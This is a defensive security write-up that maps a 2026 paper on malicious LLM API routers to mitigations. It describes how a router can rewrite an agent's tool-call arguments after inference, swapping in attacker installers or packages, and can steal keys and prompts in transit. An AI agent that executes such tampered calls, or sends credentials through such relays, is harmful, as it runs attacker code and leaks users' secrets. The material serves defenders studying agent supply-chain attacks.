Paper Published: Apr 25, 2026

Your Agent Is Mine: Malicious LLM API Routers as an Agent Supply-Chain Boundary

This paper shows that third-party LLM API routers are not just compatibility layers. Because they terminate client traffic and forward plaintext tool-call JSON upstream, a malicious or compromised router can rewrite executable tool arguments, steal secrets in transit, and selectively target autonomous agent sessions. The defensive lesson is to treat router choice, route policy, tool execution, and request logging as one governed security boundary.

Credential TheftTool Argument TamperingTool AuthorizationAgentic AIAPI Routers

8 applicable AIDEFEND defenses

Source: Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain

Authors: Hanzhi Liu, Chaofan Shou, Hongbo Wen, Yanju Chen, Ryan Jingyang Fang, Yu Feng

Original article: Apr 9, 2026

Threat Analysis

The router sits in the application-layer middle. The client intentionally points its base URL at the router, so TLS protects the hop to the router but does not prove that the returned tool call is what the upstream model produced.
Payload injection happens after inference. The model can produce a benign Bash call, then the router can replace one argument with an attacker-controlled installer or package name while preserving valid JSON and schema shape.
Secret theft does not require visible tampering. API keys, cloud credentials, system prompts, tool definitions, file contents, and environment variables all cross the router in plaintext.
The ecosystem signal is already practical. The authors found malicious paid and free routers, AWS canary use, ETH theft, adaptive triggers, and 440 command-injectable Codex sessions through weak-router decoys.
Client-side controls help, but do not prove origin. Policy gates, anomaly screening, and append-only logs reduce exposure today; provider-signed response envelopes are the longer-term integrity answer.

Applicable AIDEFEND Defenses (8)

AID-H-019.004

Intent-Based Dynamic Capability Scoping

Very High

The paper's strongest immediate defense is a fail-closed policy gate for high-risk tools such as Bash, run_command, and package installs. Per-session capability scopes make malicious router rewrites physically unable to call tools or package paths outside the approved task envelope.

AID-H-019.005

Value-Level Capability Metadata & Data Flow Sink Enforcement

Very High

Passive router exfiltration is dangerous because secrets and high-sensitivity values ride through ordinary request and tool-output fields. Tracking value provenance and blocking unsafe transfers into external HTTP, shell, package, or logging sinks directly targets the AC-2 data-flow problem.

AID-H-034.004

Route Policy Bundle Versioning, Approval, Canary & Rollback

High

Moving an agent to a third-party router can be as small as changing a base URL and API key. Treat those route policies as signed, reviewed, canaried security artifacts so teams cannot silently drift from approved providers into weak relay chains or untrusted compatibility endpoints.

AID-H-004.002

Service & API Authentication

High

The poisoning studies show how leaked upstream keys and weak relays turn benign-looking routers into plaintext visibility points. Scoped service credentials, short lifetimes, per-router keys, and rapid revocation limit how much traffic a stolen or reused key can expose.

AID-H-026.003

Pre-Execution Static Scan

High

AC-1 becomes severe when a rewritten tool call reaches an interpreter or shell. Pre-execution scans for dangerous command patterns, installer fetches, typosquat package names, and shell passthrough wrappers give the client a deterministic stop before the modified payload runs.

AID-I-001.003

Ephemeral Single-Use Sandboxes for Tools

High

The study found many command-injectable sessions, most already running in auto-approve mode. Sandboxed tool execution, constrained network egress, and low-secret workspaces do not authenticate the tool call, but they sharply reduce damage if a malicious router changes what executes.

AID-D-003.003

Agentic Tool Use & Action Policy Monitoring

Medium

The paper's response-side anomaly screener maps here: inspect returned tool calls for shell-risk patterns, unusual arguments, secret-like strings, schema deviation, and session-level frequency shifts before those outputs reach downstream execution.

AID-D-005.002

Security Monitoring & Alerting for AI

Medium

Append-only transparency logs and SOC alerts help answer which router, account, request, and tool call were exposed after suspicious activity. This is especially important for AC-2, where the traffic may look normal until a canary or credential is used later.

What Defenders Should Do Now

Inventory every agent, IDE, CI job, and internal platform that points model traffic at a third-party API router, relay, gateway, or OpenAI-compatible base URL.
Move router configuration into reviewed route policy bundles. Block ad-hoc base URL changes and require per-router credentials with scoped privileges, short lifetimes, and owner metadata.
Fail closed on high-risk tool calls from routed sessions: shell execution, package installation, file writes outside the workspace, cloud CLI actions, and outbound network fetches.
Strip secrets from prompts, tool outputs, and logs before they cross untrusted routers. Use canary credentials and alert if any canary touched a cloud, repo, wallet, or SaaS API.
Enable local transparency logging for routed sessions: router URL, TLS metadata, request and response hashes, redacted payload classes, tool names, and approval mode. Keep enough retention to scope incidents.
Run routed agent sessions in low-secret sandboxes with constrained egress, especially when auto-approval or YOLO mode is enabled.

1 additional consideration

Provider-signed response envelopes for tool-call provenance

Beyond the techniques mapped above, teams using LLM routers should also push for end-to-end response integrity: the upstream provider signs a canonical envelope covering model identity, tool name, tool arguments, finish reason, nonce, and validity window.

Recommendation: Until provider support exists, pair approved router policies with fail-closed tool gates, local transparency logs, and sandboxed execution. When response signing becomes available, require clients to verify the envelope before executing any tool call.

Conclusion

The paper makes a subtle trust boundary hard to ignore: an LLM API router can be both a convenience layer and the last component to touch executable agent commands before they run. AIDEFEND maps strongly to capability scoping, data-flow sink enforcement, route-policy governance, service authentication, execution controls, and monitoring. The remaining ecosystem step is origin integrity for tool calls, so clients can verify what the upstream model actually produced before an agent acts on it.